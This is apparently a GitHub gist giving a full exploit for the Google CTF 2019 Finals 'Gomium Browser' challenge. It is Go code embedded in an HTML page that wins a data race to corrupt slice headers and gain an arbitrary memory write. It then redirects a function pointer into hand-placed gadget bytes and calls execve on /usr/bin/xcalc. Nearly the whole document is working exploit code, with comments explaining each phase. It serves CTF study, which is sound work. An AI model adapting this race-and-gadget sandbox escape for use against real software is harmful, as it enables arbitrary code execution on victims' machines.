
@hama7230
Last active August 17, 2020 19:47
Google Capture The Flag 2019 (Finals) Gomium Browser
<html>
<script type="text/goscript">
package main
import "fmt"
// bring_your_own_gadgts is not used for its result. Called normally it prints
// "hoge" and returns a + b through the tmp slice; main stores it in fptr.f and
// then redirects that function value to addrof(bring_your_own_gadgts) + 0x39,
// i.e. into the middle of this function's compiled body rather than its entry.
// The five large 64-bit constants are presumably what the compiler materialises
// as immediates at that offset (the "gadgets" of the name); the page does not
// show the compiled layout, so the +0x39 offset is specific to the build the
// author targeted. The five parameters exist only so the signature matches
// fptr.f; main passes its crafted arguments through them and none are read here.
func bring_your_own_gadgts(x uint64, y uint64, z uint64, w uint64, v uint64) uint64 {
// Constants are kept in distinct locals and copied into a slice so that they are
// not folded away at compile time (inferred from the otherwise pointless tmp).
var a uint64 = 0xc3050f585a5e5f58;
var b uint64 = 0xdeadbeefdeadbeef+1
var c uint64 = 0xdeadbeefdeadbeef+2
var d uint64 = 0xdeadbeefdeadbeef+3
var e uint64 = 0xdeadbeefdeadbeef+4
tmp := []uint64{a, b, c, d, e}
fmt.Println("hoge")
// return a + b
return tmp[0] + tmp[1]
}
// fptr holds a single function value with the same signature as
// bring_your_own_gadgts. main allocates one with new, stores
// bring_your_own_gadgts in f, rewrites the words near addrof(&func_ptr) through
// the out-of-bounds slice, and finally calls f — so the field exists to give the
// exploit a function value in memory that it can locate with addrof and
// overwrite. The parameter names mirror the target function; they carry no
// meaning of their own.
type fptr struct {
f func(x uint64, y uint64, z uint64, w uint64, v uint64) uint64
}
// addrof renders i with fmt's %p verb and parses the resulting "0x…" text back
// into an integer, recovering a pointer's numeric value without unsafe. Only the
// characters after the two-byte "0x" prefix are decoded, most-significant first,
// one nibble each; digits are mapped through '0' and every other byte through
// 'a', so uppercase or non-hex text produces a meaningless value (fmt emits
// lowercase, so that case is never hit for real pointers). A rendering of two
// characters or fewer decodes to 0.
func addrof(i interface{}) uint64 {
	text := fmt.Sprintf("%p", i)
	if len(text) <= 2 {
		return 0
	}
	digits := text[2:]
	var value uint64
	for pos := 0; pos < len(digits); pos++ {
		ch := digits[pos]
		var nibble uint64
		if ch >= '0' && ch <= '9' {
			nibble = uint64(ch - '0')
		} else {
			// relies on lowercase hex; other bytes wrap around, as in the original
			nibble = uint64(ch) - 'a' + 10
		}
		// the final character is the least-significant nibble
		shift := uint(len(digits)-1-pos) * 4
		value += nibble << shift
	}
	return value
}
// win is the race-outcome flag shared between main and its flipping goroutine:
// main sets it once len(target) has been corrupted and the goroutine spins on it.
// It is read and written with no synchronisation at all.
var win bool
// main is the exploit entry point; it is not expected to return normally. Phases:
//   1. leak the addresses of the locals below with addrof (the printed values
//      read as the author's diagnostics);
//   2. win a data race so that `target` (allocated with len 4) ends up with a
//      slice header claiming a length above 0x10 — the `len(target) > 0x10`
//      test is what decides the race was won;
//   3. extend that corruption into `oob` so it behaves as an absolute-address
//      write primitive, then use it to redirect func_ptr.f;
//   4. call func_ptr.f with crafted arguments (the body's own comments name
//      "//usr/bin/xcalc", "DISPLAY=:0" and execve()).
// Every numeric offset in the body is tied to the memory layout and code
// generation of the build this was written against; nothing here is portable.
// Both the slice flipping and the `win` flag are unsynchronised shared state
// that the Go race detector (-race) would report, and the retry loop has no
// bound, so a run that never observes a mixed header spins forever.
func main() {
// Two slices of different lengths for the goroutine to alternate between, plus
// the two whose headers are meant to be corrupted. `oob` is the only []uint64.
long := make([]*uint64, 8)
short := make([]*uint64, 4)
target := make([]*uint64, 4)
oob := make([]uint64, 4)
func_ptr := new(fptr)
// Only ever passed to addrof; presumably a recognisable marker for layout
// inspection — confirm against the author's notes.
str := "hogehogehogehoge"
oob[0]= 0xdeadbeef
// Phase 1. Taking each local's address here is also what makes it addressable
// for the later writes; the printed values are diagnostics, nothing reads them.
fmt.Printf("%x\n", addrof(&long))
fmt.Printf("%x\n", addrof(&short))
fmt.Printf("%x\n", addrof(&target))
fmt.Printf("%x\n", addrof(&oob))
fmt.Printf("%x\n", addrof(&func_ptr))
fmt.Printf("%x\n", addrof(&str))
// hoge is only ever used as &hoge: its address serves as a pointer in the
// typed writes and as a large integer where it lands in a slice's len/cap. The
// 0xdeadbeef… value itself is never read.
var hoge uint64 = 0xdeadbeefdeadbeef
confused := short
// Phase 2, writer side: keep overwriting the three-word header of `confused`
// with `long` (len 8) and `short` (len 4) until `win` is set. A slice assignment
// is a multi-word copy with no atomicity guarantee, so a concurrent reader can
// see a mixed header — presumably one slice's data pointer with the other's
// length.
go func() {
for win == false {
confused = long
confused = short
}
}()
// Phase 2, reader side: index past short's length. With a consistent header the
// store either lands inside long's backing array (harmless) or panics with an
// index-out-of-range (short); with a mixed header it lands past short's four
// elements into adjacent memory — apparently target's header in this build,
// which is why a grown len(target) is the success signal.
g := func() {
confused[5] = &hoge
confused[6] = &hoge
if len(target) > 0x10 {
win = true
return
}
}
// f wraps g so the expected panic from the losing case is swallowed and the
// loop can retry. Note that every panic, not just index-out-of-range, is
// discarded here.
f := func() {
defer func() {
if r := recover(); r != nil {
}
}()
g()
}
for win == false {
f()
}
fmt.Println("race win")
fmt.Println("len(target)=", len(target))
// Phase 3. target now indexes well past its real four elements. Indices 4..6
// appear to overlap oob's slice header: a nil data pointer, then hoge's address
// as len and cap, so from here on oob[k] addresses absolute memory at 8*k —
// which is why every oob index below is an address divided by 8. The second
// `target[6] = &hoge` is a duplicate of the line before it.
target[4] = nil
target[5] = &hoge
target[6] = &hoge
target[6] = &hoge
// Give f a genuine function value first, then (apparently) widen oob's own
// len/cap — the two words following its header address.
func_ptr.f = bring_your_own_gadgts
oob[addrof(&oob)/8 + 1] = addrof(&func_ptr)+ 0x100
oob[addrof(&oob)/8 + 2] = addrof(&func_ptr)+ 0x100
// overwrite function pointer
// The two stores appear to point func_ptr.f at a fabricated function value
// placed 0x18 past &func_ptr, whose code address is bring_your_own_gadgts+0x39
// (inside that function's body, not its entry) — see its comment.
oob[addrof(&func_ptr)/8 + 1] = addrof(&func_ptr) + 0x18
oob[addrof(&func_ptr)/8 + 3] = addrof(bring_your_own_gadgts) + 0x39
// write "//usr/bin/xcalc" and its pointer
// Phase 4 data: the little-endian path bytes at &oob+0x20/+0x28 and a pointer to
// them at &oob+0x40, the start of an argv-style array.
oob[addrof(&oob)/8 + 4] = 0x69622f7273752f2f
oob[addrof(&oob)/8 + 5] = 0x00636c6163782f6e
oob[addrof(&oob)/8 + 8] = addrof(&oob) + 0x20
// write "DISPLAY=:0" and its pointer
// Same shape for the environment: string at &oob+0x50/+0x58, pointer at +0x60.
oob[addrof(&oob)/8 + 10] = 0x3d59414c50534944
oob[addrof(&oob)/8 + 11] = 0x303a
oob[addrof(&oob)/8 + 12] = addrof(&oob) + 0x50
// trigger execve()
// The arguments line up as (path, argv, envp, 59, filler); 59 is the execve
// syscall number on x86-64 Linux, consistent with the comment above. The last
// value appears to be padding only.
func_ptr.f(addrof(&oob) + 0x20, addrof(&oob) + 0x40, addrof(&oob)+0x60, 59, 0xdeadbeef)
}
</script>
</html>